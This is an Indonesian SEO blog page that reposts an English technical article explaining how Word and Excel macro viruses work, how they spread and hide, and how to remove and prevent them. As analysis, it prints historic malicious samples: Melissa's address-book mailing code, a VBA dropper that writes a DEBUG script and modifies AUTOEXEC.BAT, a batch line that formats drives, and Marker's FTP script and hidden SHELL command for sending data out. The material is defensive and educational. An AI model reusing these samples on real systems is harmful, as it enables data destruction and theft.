The following is a list of properties of macro viruses select all that are typical

The following is a list of properties of macro viruses select all that are typical – Apa khabar The following is a list of properties of macro viruses select all that are typical – Apa khabar sobs semua, Selamat datang di blog Sepertinya dot com ini. Di hari yang cerah ini, kita dari website www.sepertinya.Com ingin share saran yang oke banget tentang The following is a list of properties of macro viruses select all that are typical. Langsung saja ibu dan bapak simak setelah ini:

A simple macro is
series of steps that could otherwise be typed, selected, or configured, but are
stored in a single location so they can automated.

Many programs, such
as Word, allow you to record a series of keystrokes and menu selections and then
save them to a file. Although nifty, creating a macro one keystroke at a time
doesn’t make for fast or sophisticated application development. Macro
languages are used to allow more sophisticated macro development and
environment control. Screens can be manipulated, users can be prompted for
input, and nested if-then
statements add functionality. Macro languages allow a developer to manipulate
and create files, change menu settings, import and export data, and much more.

A macro language is a programming language, but it has its drawbacks. First, and most obvious, it cannot run without the underlying application. This leads into the second drawback — macro languages are usually interpreted, not compiled. Each macro command must be eventually broken down into its runtime counterpart, and this translation takes time.  Programs with large macros or large amounts of manipulated
data are very slow.

Why Virus Writers Like Macro Viruses

– Easy to write.

– Everyone exchanges documents and data, and in doing so, macro viruses can infect more people than their more complex counterparts.

– Can be cross-platform and multicultural, infecting any computer capable of running Office
– Internet Explorer can automatically download Office documents from the Web or from within emails without prompting the user to confirm the download.

How Macro Viruses Spread

With few exceptions, macro viruses are spread when a user opens or closes an infected document.  Documents are spread between users in the following ways: email,
diskette, Internet, and CD-ROM.

What a Macro Virus Can Do

A macro virus author can program his creation to do
almost anything that is possible with a PC. It can corrupt data, create new
files, move text, flash colors, insert pictures, send files across the Internet,
and format hard drives. Not simply limited to the already powerful macro
language commands, macro viruses are increasingly used as transport mechanisms
to drop off even nastier bugs. Macro viruses can use the VBA SHELL
command  or utilize the
operating system’s kernel API to run any external command they want. The VBA KILL
command can be used to delete files. Macro viruses modify registries, use email
to forward copies of itself to others, look for passwords, copy documents, and
infect other programs. Macro viruses can do a lot of different damage in a lot
of different ways.

Although
applications may share a common macro language, each has its own structure and
way of operating. Macros written for one type of application usually do not work
in another. Manipulating a document in Word is completely different than moving
around in an Excel workbook. Even similar events, such as adding together the
numbers from two cells, bears little resemblance to each other behind the
scenes. To understand macro viruses, you must understand how each application
uses macros.

Word
Macros

Although macros in
Word can be saved in a document, they are more often stored in a separate file
type called a template (prior to Word 97, macros had to be stored in a
template). The template can contain many of the settings a user wants to include
in her default document, like font type, toolbar settings, key assignments,
styles, font size, page layout, etc. Every Word document is based on a template,
and that template is linked to the document. Whenever an existing or new
document is opened, the template settings are applied first. A global
template, usually called NORMAL.DOT, is in memory every time Word is
loaded. This is a favorite of virus writers, because a macro placed there is
able to infect more quickly.

When you choose File->New to start a new document, Word will prompt you to choose one of your available templates to use. The Blank Document template is based on Normal.dot.

 Word comes with
dozens of predefined templates for form letters, fax cover letters, business
memos, and other forms. You can define your own personal templates and load them
into whatever documents you like using the Tools-.Templates and Add-Ins. To create a new
template, take a blank document and make the changes to it that you would like
to see reflected in all documents based upon the template. Then save your
document as a .DOT file type with File->SaveAs. When you start a new document with File->New, select your new template. You can turn
any template into a global template and load more than one global template at
one time.

Templates are
typically stored in a single subdirectory, which you can check by choosing Tools->Options->File Locations, but they can be loaded from
several locations. Personal custom templates are stored in the User
template directory, and templates shared between users are stored in the Workgroup
template subdirectory. By default, the user templates are stored in C:\%windir%\Application
Data\Microsoft or C:\%windir%\Profiles\%user_name%\Application
Data\Microsoft. Any document saved as a template (regardless of the
extension) and saved into a template subdirectory will function as a template.

Automacros

Like other
applications with macro languages, Word and Excel have the ability to
automatically launch a macro when a document or template is opened or whenever
some other key event is initiated. This is done by naming a macro after a
predefined keyword reserved for such a purpose. Here are some of the automacro’s
especially coveted by Word virus writers:

 AutoExec

Runs whenever you start Word or load the
global template

AutoOpen

Runs whenever you open an existing
document (Auto_Open in Excel) 

AutoNew

Runs whenever you create a new document 

AutoClose

Runs each time you close a document (Auto_Close
in Excel) 

AutoExit

Runs whenever you quit Word or unload
the global template

There are other system
macros, such as FileSave and FileClose in Word and Workbook_Activate
and Workbook_Deactivate in Excel, that automatically run when their
associated event happens. In these cases, saving or closing a file would run
macros with those names. There are even system macros associated with different
menu options that allow programmers to define their own happenings when a
particular menu option is chosen. Virus writers love to hide their creations by
rewriting what happens when a user chooses Tools->Macros by using a macro called ToolsMacro
(known as menu interception).

Excel
Macros

Excel data files are
called workbooks and have an .XLS extension. Each workbook can contain
many worksheets (also known as sheets or spreadsheets). Each sheet has its own
tab within the workbook. Macros in Excel can be stored in the same workbook as
the data, but can also be stored in separate workbooks. Macros meant to be
available to all workbooks are usually stored in a workbook called PERSONAL.XLS
(used to be GLOBAL.XLM in earlier versions). This file functions much
like a global template in Word.

Excel has two
startup directories where workbooks can be placed. Any workbooks in either
startup directory will automatically be called when Excel is started. Excel’s
default startup directory is usually located at either C:\%windir%\Profiles\User_name\Application
Data\Microsoft\Excel\XLStart
or C:\%windir%\Program
Files\Microsoft Office\Office\XLStart
. An alternate startup directory can
be selected using Tools->Options->General->Alternate Startup File Location.

Excel’s automacros
are called Auto_Open and Auto_Close. They are used in the same way
as automacros in Word. Macros can also be activated by different key
combinations, menu choices, and sheet activity. Macro viruses wishing to be
activated every session need only infect a workbook and store themselves in
Excel’s startup directory. Then, when Excel loads, the virus loads. Most Excel
viruses infect the current workbook, usually through a hidden sheet within the
workbook, and also infect a startup directory workbook.

Excel and Word both have the ability to load attached
programs called Add-Ins. In Excel, add-ins usually have the file
extension, .XLA. Legitimate add-ins extend the functionality of the
underlying application. Newer Excel viruses are installing themselves as Excel
add-ins (XA viruses) and using older Excel macro languages (called Excel
Formula Viruses or XF viruses ) to exploit weaknesses in antivirus detection
tools.

 
Office
2000 Security

Office 2000
introduced a new security feature, built around digital signatures, to diminish
the threat of macro viruses. Office 2000 automatically trusts macros (written in
VBA6) that were digitally signed from authors who have been previously
designated as trusted. Not all Office 2000 applications have the new
feature, but Word, Excel, Outlook, and PowerPoint, do. Access, FrontPage,
Publisher, and PhotoDraw, do not (although Access does have its own security
mechanisms). Users must have Internet Explorer 4.0 or higher for the security to
work. When opening a document containing macros, depending on security settings,
Office may notify you that untrusted macros are present.

Office 2000 macro warning dialog box

The following is a list of properties of macro viruses select all that are typical

Office cannot
ascertain whether the macro is dangerous or not, only that document contains
macro code. You can choose to disable (the default option) the macros while
opening the document, or enable them. Interestingly, the document path and name
Office displays in the warning dialog box is not always the current location of
the item. Don’t let the bug confuse you.

Security Levels

In Office 2000, you
can set macro security as High, Medium, or Low, within each
supported application. High, the default, will disable all unsigned or untrusted
macros, and accept all signed trusted macros. Medium, will prompt the user to
accept or deny the macro if it is not trusted. And Low will let all macros
execute automatically without prompting the user. You get to macro security by
choosing Tools->Macro->Security.

Office 2000 macro security menu

The following is a list of properties of macro viruses select all that are typical

Signed Macros

Macros written in VBA6 can be digitally signed to prevent tampering.

When you first open
a document containing signed macros, you may receive a warning that the signed
project’s certificate has not been authenticated. This means the project is
signed, but that the signer has not been authenticated by an outside entity For
most purposes, you should consider unauthenticated projects to be unsigned,
unless you explicitly trust the signer. Word treats unauthenticated projects
with a skeptical eye, but in some cases will allow you to accept them.

 Warning from document containing an unauthenticated,
signed macro

The following is a list of properties of macro viruses select all that are typical

Whenever you receive
a signed macro, Office will look to see if the signer is trusted. If not, Office
will allow you to see the source’s digital certificate of authenticity. The
certificate attests that the signer is who she says she is. If you accept the
certificate and signer as trusted, Office will prompt you about whether to Trust
all macros from this source. If you do, Office will run all macros from the
same source without any warnings. You have made the signer a trusted source.
You can see your list of trusted sources by choosing Tools->Macro->Security->TRusted Sources from your application.
When you install a brand new copy of Office, no sources are trusted (unless your
network administrator has forced some through during a network install).

Event/Security level

High

Medium

Low

Unsigned macros

Automatically ignored

User will be prompted to disable or enable

Automatically executed

Signed macros from a trusted source

Automatically executed

Automatically executed

Automatically executed

Signed macros from an untrusted source

User shown certificate and prompted to disable or enable macros

User shown certificate and prompted to disable or enable macros

Automatically executed

Signed macros with an invalid signature or certificate

User warned, macros disabled

User warned and prompted to disable or enable; or macros automatically disabled

Automatically executed

Macro
Virus Technologies

Word Infections

Word macro virus infection pathway

The following is a list of properties of macro viruses select all that are typical

Typically, menu options are rewritten by malicious macros to help the infection process.

Excel Infections

The Excel macro
virus, Laroux, is one of the most widely reported virus infections in the world
today and is a good example to talk about. Written in 1996, it used VBA 3.0 to
infect Excel 5.0 and later versions. When an infected workbook is opened, the
virus uses the Auto_Open macro to hand over control to the main virus
macro, check_files. The virus then checks to see if it has infected the
current workbook and looks to see if an infected copy is stored in Excel’s
startup directory. If not, it infects the current workbook by creating a hidden
infected sheet, and saves a copy of itself to a file created in the startup
directory so that it gets loaded every time Excel starts. It then infects every
sheet that is clicked on. It contains no intentionally destructive routines, but
can still cause problems because of its lack of error checking. Macros and data
can inadvertently be overwritten as the virus goes to work.

General Macro Virus Techniques

Advances in
antivirus technology and Microsoft security changes forced macro virus writers
to learn new tricks. This next section talks about macro virus technologies
beyond the early examples.

Email viruses

Unfortunately, using
VBA it is all too easy for a virus to send itself to other victims using email.
VBA allows a virus writer to query the system to get all the necessary
information (email application name, user’s name and email password) and send an
attachment via email. MAPI , or Messaging Application Programming
Interface, is the de facto standard for Windows email programs. It can be
used by many computer languages to send email from a user’s workstation to
another user. Example below shows how the Melissa virus read the address book of
infected users to get 50 recipient’s email addresses to send itself to:

Melissa virus code sample

;Comments by Roger A. Grimes
Set UngaDasOutlook = CreateObject(“Outlook.Application”)
;creating an instance of Outlook
If System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\
Office\”, “Melissa?”) <> “… by Kwyjibo” Then
If UngaDasOutlook = “Outlook” Then
;if Outlook is the email engine…
DasMapiName.Logon “profile”, “password”
;get email user’s name and email password
For y = 1 To DasMapiName.AddressLists.Count
;set up getting ready to count number of contacts in address book
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
;get up to 50 email addresses from address book
;end of Melissa code sample

Using those lines of
code, Melissa was able to spread around the world in three days and shut down
the world’s biggest email servers. It also earned its programmer a guilty
conviction. The malicious emailing is done in the background without the user
noticing, with the exception of some temporary computer slowness. Hundreds of
macro viruses now use VBA and MAPI to send themselves around the world,
effectively becoming a new class of worms. The proliferation of emailing viruses
has led most corporations to install a virus scanning engine on their email
servers to remove the virus before it gets to the end user.

Stealth macro viruses

As macro viruses
have become more popular, Microsoft has developed different notification methods
that should alert the user that something is wrong. Unfortunately, all of these
notifications are easy for macro viruses to disable, and even when they aren’t,
most end users don’t understand what the warnings are trying to communicate.
With Office 97 and 2000, the macro virus warnings are written a bit more
clearly.

Macro viruses have a
handful of ways to hide themselves from default end-user inspection, although
most of the stealth routines will not take place until after the user has
ignored the original warnings and accepted the virus first. A macro virus cannot
disable preset warning prompts and settings during its first activation. The
most common setting simply warns you of any document containing a macro, whether
or not the macro is malicious.

Unfortunately, documents not containing any macros can cause the macro warning to pop up. Documents with key bindings, menu or button redefinitions, or even documents that used to contain macros but don’t currently, can set off the macro warning.

Viruses can modify
the registry settings to stop Office from notifying the user of any macros.
Other security settings can be disabled in VBA by writing the appropriate macro
command to an infected template. The following macro commands all contribute to
hiding the virus’s activities:

·        
.ConfirmConversions=FALSE

·        
.VirusProtection=FALSE

·        
.SaveNormalPrompt=FALSE

·        
.DisplayAlerts=False

Another common
stealth technique is to disable the Tools->Macro menu option so the running macros
cannot be inspected. One of the earliest Word macro viruses, Colors, is
considered the first stealth macro virus because it used that method to hide.
Even stealthier viruses create a fake Macro Editor menu that hides the presence
of their macros. Since most Word macro viruses depend on infecting the global
template, they will disable Word’s default prompt of Save Changes to Global
Template
so the new macros are saved without end-user notification.
Lastly, macros and documents written in previous versions of Office will end up
making newer versions that prompt the user to see if they want to convert. Macro
viruses can disable the prompt so Office will convert the document without
asking the user for a response. Even if a virus turns off the conversion
prompting, if the end user is looking, Office usually displays the macro name
being converted on the status bar during the conversion process. Most users
don’t notice.

In Word Basic,
macros can be marked as Execution-only with a simple command-line switch
when copying a macro:

Example: MacroCopy “Test.Dot:AAAZFSA”, “Global:FileSaveAs”, 1

The 1 tells
WordBasic to make the macro Execution-only. Execution-only macros cannot be
viewed or edited, although they are not especially encrypted. The Edit
button will be grayed out whenever an Execution-only macro is selected. File
editors can still view the file and make out subroutines, function names, and
comments.

VBA allows macro
viruses to “lock” themselves from viewing and can only be viewed if
the user knows the correct password. However, if the VBA project is password
protected, no modules can be copied for it. So, only viruses that use a very
limited set of replication mechanisms (ones that either copy the file as a whole
— like X97M/Papa.B — or ones that copy the data of the target file to the one
containing the virus and then overwrite the target file with the modified
infected one — like X97M/Jini.A does) can exist.

Encrypted and polymorphic macro viruses

Like their
executable counterparts, many macro viruses change their appearance to avoid
scanning detection. Random encryption routines are used to hide the virus code,
but the cipher routines tend to be weaker than their executable virus
counterparts. Some viruses randomly rename the macro names and memory variables.
Others create their macros on the fly. They do this by storing most of the
macros as plain text within the document, and calling a built-in macro builder.
The macro builder then builds the macros and executes them.

Dropping off a friend

One of the scariest
mechanisms a macro virus can contain is a routine to install a more dangerous
virus or Trojan. Although most macro languages limit the scope of what can be
manipulated by the application, sophisticated macro languages (like WordBasic
and VBA) allow the external file and operating system to be modified. VBA and
WordBasic allow external files to be created and existing files to be deleted or
modified. Many macro viruses create a text file containing hexadecimal byte
codes (assembly language commands) on a user’s hard drive, and then modify the AUTOEXEC.BAT
file so that the next time the PC is rebooted, DEBUG.EXE is called to
compile the text file and convert it to an executable, and then it is executed.
Thus, an even more malicious virus or Trojan can attack a computer. And all the
user did was open a Word document sent by a friend or coworker. An early macro
virus named Nuclear was the first to including a virus dropper (although the
first versions were too buggy to work). Example below shows sample coding that
could be used in conjunction with DEBUG.EXE to spread a virus (code is
deliberately crippled).

 Example of macro
virus coding to drop off a file virus

;First part of code creates the source code file to be compiled later
Open “C:\VIRUS.SCR” For Output as #1
;Source code called VIRUS.SCR
Print #1, “N VIRUS.COM”
;Compiled code will be called VIRUS.COM
;Next commands write in hexadecimal codes
Print #1, “E 0840 81 3C 44 75 21 80 3C 4D 74 12 80 3C 54 74 0D 8B”
Print #1, “E 0850 44 01 48 8E C0 03 44 03 8E D8 EB E9 8D 03 26 2B”
Print #1, “E 0860 44 F2 26 89 44 F3 1F 8C D8 2B E8 95 05 4D 01 2E”
Print #1, “E 0870 8C 1E 8E 05 0E 1F A3 95 05 8E C2 B0 D6 A2 B4 04”
Print #1, “E 0880 B9 DC 14 33 F6 33 FF FC F3 A4 8E D9 8C 06 E3 04”
Print #1, “Q”
;Quit DEBUG.EXE
Close #1
;next create a batch file that will compile the virus
;needs to be added to autoexec.bat so that the next time the PC is
;rebooted, virus will run
Open “C:\GOTYA.BAT” For Output as #1
Print #1, “debug<virus.scr>nul”
;Feeds source code into DEBUG.EXE command to compile file
Print #1, “echo @C:\VIRUS.COM>>C:\AUTOEXEC.BAT
;inserts compiled virus into autoexec.bat file so it gets run after the
;next reboot.
Close #1
ChDir “C:\”
Shell “GOTYA.BAT”, 0
;Shell command runs batch file to compile virus and modify autoexec.bat
;end of example

If you see code
resembling the example above, you can be almost 100 percent sure it is a virus or Trojan.

More external manipulation with VBA

VBA contains plenty
of functionality to allow macro viruses to interact with the PC outside of the
scope of the application. Here are a few examples:

·        
The VBA KILL command allows any file on the local hard
drive to be deleted. It supports wildcard (* or ?) symbol use, although it won’t
work on Macintosh versions of Word.

·        
Macro viruses can delete subdirectories with the RMDIR
command.

·        
The SHELL command is the most powerful command and allows
any external command to be executed.

·        
Better yet, for malicious code writers it has a parameter, vbHide,
which allows the external command to be run in a hidden window.

These four example
commands can make any PC vulnerable to numerous types of attack.

Random evolution

Because macro
viruses can contain many of the same macro names, such as AutoOpen
or FileSaveAs, it is not uncommon for a
document infected with two different macro viruses to end up creating a new
virus that includes routines from each of the former.

Macro
Virus Examples

Here are some
representative sample descriptions that demonstrate the versatility of macro
viruses.

W97M.Melissa.ac

This Melissa variant
attempts to format local hard drives and corrupts CMOS memory, along with using
email clients to forward itself. It drops off a batch file, called DRIVES.BAT,
that contains the following the commands that will format hard drives:

echo y|format/q d: /v:Empty>NUL

 This command is
repeated for drives D thru Z.

It also edits the AUTOEXEC.BAT
file to run a dropped malicious file, Y2K.COM. This executable file will
attempt to corrupt your CMOS settings (disabling the hard drive, etc.), but
usually does not result in permanent damage to your CMOS.

W97M.Marker

Marker is a Word
macro virus that keeps track of who it infects and transmits this information to
a well-known hacker site (now closed). It creates two temporary ASCII text files
on the local hard drive with names like NETLDX.VXD and HSFEDRT.SYS.
The .SYS file contains the virus code and the .VXD file is a
script file that is used with FTP.EXE to send information back to the hackers.
The .VXD file contains the commands in the example below:

Example Marker virus
FTP script file

o 209.201.88.110
;opens an ftp connection to hacker’s ftp site
user anonymous
;logs user in as anonymous
pass [email protected]
;puts in password
cd incoming
;changes to subdirectory called incoming on hacker’s site
ascii
;puts file transfer in ascii text transmission mode
put hsfedrt.sys
;uploads tracking information to ftp site, where hsfedrt.sys can be any
;randomly generated name.
quit
;ends ftp session

The macro code
contains the following SHELL command, which allows it to do its work
secretly:

SHELL “COMMAND.COM /C FTP.EXE -n -s:c:\netldx.vxd”, vbHide

It also disables
Word’s macro warning prompt. It keeps track of the user information found in
Word’s User Name and User
Address
information fields. Thus, anyone infected can usually find out
who infected them and trace the origin of the virus back several generations.
The virus maintains a setting in the registry (HKCU\Software\Microsoft\MS Setup
(ACME)\User Info\LogFile) to keep track of whether it has sent information from
this particular user before. If so, it doesn’t do it again.

Although ACME conjures up images of roadrunner cartoons, it is a valid subkey name coded by Microsoft and not by the virus.

Example below shows
a log file provided in an example I received (names and addresses have been
changed to protect the innocent):

Marker virus log file

‘Logfile
’09:08:36 – Saturday, 28, Nov 1998
‘Richard D. Collier, III
‘RichDesigns.net

’02:50:31 PM – Saturday, 28 Nov 1998
‘Elizabeth Rose’
‘Straight-A Students, Inc.

’12:49:03 PM – Saturday, 9 Jan 1999
‘Lillian Hanson
‘Genius Tutoring
‘Two Embargo, Suite 3800
‘Richmond, CA 94111

Caligula Word Virus

The Codebreaker
group released another intriguing macro virus. This one attempts to steal users’
PGP private keys. PGP , or Pretty
Good Privacy
, is one of the world’s most popular data and email
encryption programs. PGP users have a private encryption key that is used to do
the encrypting. It is encrypted itself, but usually protected by a weak
password. The Caligula virus is a stealth Word infector written in VBA5. When
loaded, it checks to see if the current Word document or global template
contains a class module called Caligula. If not, it exports its source code to a
file called IO.VXD, and imports it to the global template. On the 31st
of any month, it will display a message saying “No cia, No nsa, No
satellite, Could map our veins. WM97/Caligula © Opic [Codebreakers 1998].”

Each time the virus
is run it looks to see if it has already tried to steal the user’s PGP private
key (if one exists) by looking in registry entry HKCU\Software\Microsoft\MS
Setup (ACME)\User Info. It looks for the value, Caligula. If present, it means
it has already tried, or PGP isn’t loaded on the user’s PC. If not, it looks for
PGP’s install path from the registry and searches for the private key, which by
default is named SECRING.SKR. Next, a new text file, CDBRK.VXD, is
created as an FTP scripting file to upload the user’s private key to the
Codebreakers’ FTP site. Even on users’ systems without PGP, the virus will keep
on replicating like any normal macro virus. I’m not sure of the legal reasons,
but many computer security experts said this macro virus action (the stealing of
a user’s private encryption key) did not violate U.S. law. Luckily, the
Codebreakers web site was shutdown in an unrelated hunt for the Melissa virus
writer.

Triplicate Virus

Triplicate is a
common macro virus and the first cross-platform virus to infect three
applications: Word, Excel, and PowerPoint. It infects the global template in
Word, places an infected workbook called BOOK1 in Excel’s Startup
directory, and creates a new macro module called Triplicate
in Powerpoint. Triplicate was initially placed on a virus writer’s web site,
hidden in a web link. If a user clicked on the web link, it would load an
infected document. In many cases, it would load in Word from within the browser
without setting off any macro virus warnings.

GaLaDRieL

GaLaDRieL is the
first virus based on Corel Script, the macro language for Corel Draw. It
does a simple file search for new victim files (files with .CSC extension
and the appropriate attributes). When a suitable file is found, it looks for the
following text, “REM ViRUS,” which identifies previously infected
files. Its nonmalicious payload goes off on June 6 and displays an excerpt from The
Lord of The Rings
.

W2KM_PSD

Long before Office 2000 was officially released, it had
its first macro virus. This polymorphic class virus waits until the day of the
month is the same as the current minute, and then fills the current document
with between 1 and 70 random shapes. It disables Word 2000’s macro security by
modifying the following registry key: HKCU\Software\Microsoft\Office\9.0\Word\Security.

Most of the newer
versions of Office (97 and later) will warn you if a document, workbook, or
datafile contains macros with the following message:

C:\<path>\<filename>
contains macros. Macros may contain viruses. It is always safe to disable
macros, but if the macros are legitimate, you might lose some functionality.

Office 2000’s/XPs default security level, High, will disable macros and not display a warning.

Your Word Document Will Only Save as a Template

 Notice the difference between the document type icons

The following is a list of properties of macro viruses select all that are typical

Unexpected Document Modifications, Words, Messages, Graphics

New Macros Appear

Tools->Macro Is Disabled

Global Template File Date Is Current

Startup Directory Contains New Files

Removing
Macro Viruses and Repairing the Damage

Try a Virus Scanner

Get a Clean Application

Bypass Automacros

Holding down your Shift key while opening Word or
Excel, or while opening up a document, workbook, or template will
automatically disable any automacros present. The Shift key can be held
down while exiting to disable any AutoClose
macros.  

Inspect Data and Delete Malicious Macros

Open up your
suspected macro document, being sure to disable macros. You have three macro
tools within Office at your disposal: Macro Editor, Organizer, and Visual Basic
Editor. I usually use all three to ensure everything is cleaned up. Make sure
the infected document is in the active window. Use the Macro Editor, Tools->Macro->Macros to view and delete any visible
macros. Be sure to click All
active templates and documents
at the bottom. Choosing the Edit
option opens up VBE so you can inspect the macro code closer. With VBE, you can
remove individual macro lines, although since most documents and workbooks
shouldn’t contain macros, it’s just as easy to delete the whole macro in the
Macro Editor or Organizer. You can’t view or edit macro code in the Organizer,
as it acts on the macro as a whole. Clean any suspected templates before
cleaning files, or else your hard work will be for naught.

Using Organizer

Organizer excels at cleaning up and
inspecting template files. Choose Tools->Templates and Add-ins->Organizer so you can view the visible
macros and other associated template properties. If a template file contains
properties that would be hard to re-create if the whole file was deleted, you
can use the Organizer to create a new template from the old (minus the macro
virus code):

1.     
Rename the old infected template prior to starting Word. Word will create
a blank copy when you restart it.

2.     
Open the Organizer. The new global template should already be loaded in
one window.

3.     
Open the old, infected template with the Open
File
button in the other window (you may need to select Close File first).

4.     
Select the Macro
Project Items
tab and delete suspected macros.

5.     
Use the other tabs to copy and delete other formatting properties as
desired.

6.     
Click Close
File
to close the global template or file. When prompted to save
changes to the file, choose Yes.

Using VBE

The Visual Basic Editor is one of your
best tools for fighting macro viruses. First, open the suspected document in
Word, and choose to disable macros, if prompted. Next, hit Alt-F11
to open VBE.

If VBE refuses to load because macros are disabled, start a new blank document (without closing the other document) and hit Alt-F11 again. It will load and you can select the other document and its modules to view.

In the Project
Explorer window, expand the suspected project. Expand the module folder and
click on a module and it should appear in the code window. The figure below
shows the PSD2000 macro virus and its source code. Remember, virus coding can be
hiding in projects besides ThisDocument or ThisWorkbook.

Repairing Word Documents

If your virus
scanner does not recognize the macro virus and you don’t want to manually remove
macro virus coding, save your Word document as rich text format (RTF).
This will save most of the formatting, but remove the macro code (it will remove
all macros, not just malicious code). You can then open it back up in Word and
resave. Make sure the virus is not active, so it can’t play tricks on you like
the Cap virus does.

An alternate method
is to select the entire document and repaste to a new, clean document file.
Choose Edit->Copy. Close the infected document. Select File->New and select a template type to start a
new document. Choose Edit->Paste to paste the document content (minus
macros) to the new document. Use your macro inspection tools to verify that you
did not copy the macro virus code with the content.

Restore from a Backup

Preventing
Macro Viruses

Macro viruses are
the number one type of malicious mobile code. Here are some recommendations to
prevent them from attacking your environment.

Disable Macros in Documents

Set Office Security to High

Save Normal Template Prompt

When the global
template is modified, Word can be configured to notify you that the global
template should be saved. Choose Tools->Options->Save tab, and then check the Prompt
to save Normal template
option. Then while exiting, if the global
template has changed, Word will prompt you to save the template. If you have not
intentionally modified it, this might infer that a macro virus is present and
should not save it. All documents opened before you are warned that the virus is
attempting to modify your global template, which may already be infected.

The following is a list of properties of macro viruses select all that are typical | Admin | 4.5

Comments are closed.